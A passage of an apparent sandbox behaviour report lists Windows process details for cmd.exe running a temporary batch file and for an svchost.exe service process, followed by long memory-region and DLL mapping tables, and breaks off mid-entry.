"0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x10b4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\pKg6lHYNlR2L.bat\" \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2723 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2724 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2725 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2726 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2727 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2728 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2729 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2730 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2731 start_va = 0x3f0000 end_va = 0x441fff monitored = 1 entry_point = 0x404fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2732 start_va = 0x450000 end_va = 0x444ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 2733 start_va = 0x4600000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 2734 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2735 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2736 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2737 start_va = 0x7fff0000 end_va = 0x7dfb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2738 start_va = 0x7dfb28b00000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfb28b00000" filename = "" Region: id = 2739 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2740 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Thread: id = 324 os_tid = 0xb90 Process: id = "84" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4530000" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_scheduled_job" parent_id = "80" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d004" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5248 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5249 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5250 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5251 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 5252 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 5253 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 5254 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5255 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5256 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 5257 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 5258 start_va = 0x7ff6d0320000 end_va = 0x7ff6d032cfff monitored = 0 entry_point = 0x7ff6d0323980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 5259 start_va = 0x7ff8ff8d0000 end_va = 0x7ff8ffa90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5376 start_va = 0x5b0000 end_va = 0x5b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 5377 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 5378 start_va = 0x7ff8fc5d0000 end_va = 0x7ff8fc7b7fff monitored = 0 entry_point = 0x7ff8fc5fba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5379 start_va = 0x7ff8fd1f0000 end_va = 0x7ff8fd29cfff monitored = 0 entry_point = 0x7ff8fd2081a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5380 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5381 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 5382 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5383 start_va = 0x7ff8fe040000 end_va = 0x7ff8fe09afff monitored = 0 entry_point = 0x7ff8fe0538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5384 start_va = 0x7ff8fcfc0000 end_va = 0x7ff8fd0dbfff monitored = 0 entry_point = 0x7ff8fd0002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5385 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5386 start_va = 0x7ff8fb090000 end_va = 0x7ff8fb183fff monitored = 0 entry_point = 0x7ff8fb09a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 5387 start_va = 0x7ff8fccd0000 end_va = 0x7ff8fcf4cfff monitored = 0 entry_point = 0x7ff8fcda4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5388 start_va = 0x7ff8fe0a0000 end_va = 0x7ff8fe13cfff monitored = 0 entry_point = 0x7ff8fe0a78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5389 start_va = 0x7ff8fc870000 end_va = 0x7ff8fc8d9fff monitored = 0 entry_point = 0x7ff8fc8a6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5390 start_va = 0x700000 end_va = 0x876fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5391 start_va = 0x880000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 5392 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 5393 start_va = 0x480000 end_va = 0x55cfff monitored = 0 entry_point = 0x4de0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5394 start_va = 0x7ff8fbf40000 end_va = 0x7ff8fbf4efff monitored = 0 entry_point = 0x7ff8fbf43210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5395 start_va = 0x7ff8fda00000 end_va = 0x7ff8fdb55fff monitored = 0 entry_point = 0x7ff8fda0a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5396 start_va = 0x7ff8fd870000 end_va = 0x7ff8fd9f5fff monitored = 0 entry_point = 0x7ff8fd8bffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5397 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 5398 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 5399 start_va = 0xb90000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 5400 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5401 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 5402 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5403 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 5404 start_va = 0xd20000 end_va = 0x111afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 5405 start_va = 0x700000 end_va = 0x846fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5406 start_va = 0x870000 end_va = 0x876fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 5407 start_va = 0x1120000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 5408 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 5411 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5412 start_va = 0x840000 end_va = 0x846fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 5413 start_va = 0x7ff8f63e0000 end_va = 0x7ff8f63f7fff monitored = 0 entry_point = 0x7ff8f63e5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 5414 start_va = 0x7ff8f65c0000 end_va = 0x7ff8f670cfff monitored = 0 entry_point = 0x7ff8f6603da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 5415 start_va = 0x7ff8faba0000 end_va = 0x7ff8fababfff monitored = 0 entry_point = 0x7ff8faba2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 5416 start_va = 0x7ff8f63d0000 end_va = 0x7ff8f63d9fff monitored = 0 entry_point = 0x7ff8f63d1660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5417 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 5418 start_va = 0x7ff8fdf10000 end_va = 0x7ff8fdfd0fff monitored = 0 entry_point = 0x7ff8fdf30da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5419 start_va = 0x1400000 end_va = 0x1542fff monitored = 0 entry_point = 0x1428210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5420 start_va = 0x1400000 end_va = 0x14f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 5421 start_va = 0x1500000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 5422 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 5423 start_va = 0x7ff8f6210000 end_va = 0x7ff8f621afff monitored = 0 entry_point = 0x7ff8f6211770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 5424 start_va = 0x7ff8f87b0000 end_va = 0x7ff8f8841fff monitored = 0 entry_point = 0x7ff8f87fa780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 5425 start_va = 0x7ff8f6090000 end_va = 0x7ff8f620bfff monitored = 0 entry_point = 0x7ff8f60e1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 5426 start_va = 0x7ff8fbef0000 end_va = 0x7ff8fbf3afff monitored = 0 entry_point = 0x7ff8fbef35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5427 start_va = 0x7ff8fdc10000 end_va = 0x7ff8fdcb6fff monitored = 0 entry_point = 0x7ff8fdc258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5428 start_va = 0x7ff8fca70000 end_va = 0x7ff8fcc36fff monitored = 0 entry_point = 0x7ff8fcacdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 5429 start_va = 0x7ff8fbf70000 end_va = 0x7ff8fbf7ffff monitored = 0 entry_point = 0x7ff8fbf756e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 5430 start_va = 0x7ff8fdea0000 end_va = 0x7ff8fdf0afff monitored = 0 entry_point = 0x7ff8fdeb90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5431 start_va = 0x7ff8fa7a0000 end_va = 0x7ff8fa7dffff monitored = 0 entry_point = 0x7ff8fa7b1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 5432 start_va = 0x7ff8f5f80000 end_va = 0x7ff8f5fe0fff monitored = 0 entry_point = 0x7ff8f5f84b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 5433 start_va = 0x1600000 end_va = 0x16fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 5434 start_va = 0x7ff8f5eb0000 end_va = 0x7ff8f5f77fff monitored = 0 entry_point = 0x7ff8f5ef13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 5435 start_va = 0x7ff8f8970000 end_va = 0x7ff8f89a5fff monitored = 0 entry_point = 0x7ff8f8980070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 5436 start_va = 0x7ff8f5dd0000 end_va = 0x7ff8f5e24fff monitored = 0 entry_point = 0x7ff8f5ddfc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 5437 start_va = 0x7ff8fbf50000 end_va = 0x7ff8fbf63fff monitored = 0 entry_point = 0x7ff8fbf552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5438 start_va = 0x1120000 end_va = 0x11fcfff monitored = 0 entry_point = 0x117e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 5439 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 5440 start_va = 0x7ff8f5db0000 end_va = 0x7ff8f5dc2fff monitored = 0 entry_point = 0x7ff8f5db57f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 5441 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 5442 start_va = 0x7ff8fb260000 end_va = 0x7ff8fb2b5fff monitored = 0 entry_point = 0x7ff8fb270bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5443 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 5444 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 5445 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 5446 start_va = 0x7ff8fdb60000 end_va = 0x7ff8fdc06fff monitored = 0 entry_point = 0x7ff8fdb6b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5447 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5448 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 5449 start_va = 0x7ff8f5d80000 end_va = 0x7ff8f5da6fff monitored = 0 entry_point = 0x7ff8f5d83bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 5450 start_va = 0x7ff8fe140000 end_va = 0x7ff8fe19bfff monitored = 0 entry_point = 0x7ff8fe15b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 5451 start_va = 0x7ff8fe1a0000 end_va = 0x7ff8ff6fefff monitored = 0 entry_point = 0x7ff8fe3011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5452 start_va = 0x7ff8fc940000 end_va = 0x7ff8fc982fff monitored = 0 entry_point = 0x7ff8fc954b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5453 start_va = 0x7ff8fbf80000 end_va = 0x7ff8fc5c3fff monitored = 0 entry_point = 0x7ff8fc1464b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5454 start_va = 0x7ff8fdfe0000 end_va = 0x7ff8fe031fff monitored = 0 entry_point = 0x7ff8fdfef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5455 start_va = 0x7ff8f5d40000 end_va = 0x7ff8f5d7dfff monitored = 0 entry_point = 0x7ff8f5d4a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5456 start_va = 0x7ff8fb360000 end_va = 0x7ff8fb36bfff monitored = 0 entry_point = 0x7ff8fb3627e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5457 start_va = 0x7ff8fb6b0000 end_va = 0x7ff8fb6cefff monitored = 0 entry_point = 0x7ff8fb6b5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5458 start_va = 0x7ff8fc9b0000 end_va = 0x7ff8fca64fff monitored = 0 entry_point = 0x7ff8fc9f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5459 start_va = 0x7ff8f5d20000 end_va = 0x7ff8f5d36fff monitored = 0 entry_point = 0x7ff8f5d25630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 5460 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 5461 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 5462 start_va = 0x7ff8f5d00000 end_va = 0x7ff8f5d1ffff monitored = 0 entry_point = 0x7ff8f5d039a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 5463 start_va = 0x7ff8fa910000 end_va = 0x7ff8fa936fff monitored = 0 entry_point = 0x7ff8fa917940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 5464 start_va = 0x7ff8f5cf0000 end_va = 0x7ff8f5cfbfff monitored = 0 entry_point = 0x7ff8f5cf14d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 5465 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 5466 start_va = 0x1d00000 end_va = 0x2036fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5467 start_va = 0x7ff8f5cb0000 end_va = 0x7ff8f5ce6fff monitored = 0 entry_point = 0x7ff8f5cb6020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 5468 start_va = 0x7ff8f5c50000 end_va = 0x7ff8f5ca4fff monitored = 0 entry_point = 0x7ff8f5c53fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 5469 start_va = 0x7ff8f5b90000 end_va = 0x7ff8f5c4efff monitored = 0 entry_point = 0x7ff8f5bb1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 5470 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 5471 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 5472 start_va = 0x7ff8f5b70000 end_va = 0x7ff8f5b89fff monitored = 0 entry_point = 0x7ff8f5b72cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 5473 start_va = 0x7ff8fdd40000 end_va = 0x7ff8fde82fff monitored = 0 entry_point = 0x7ff8fdd68210 region_type = mapped_file name = 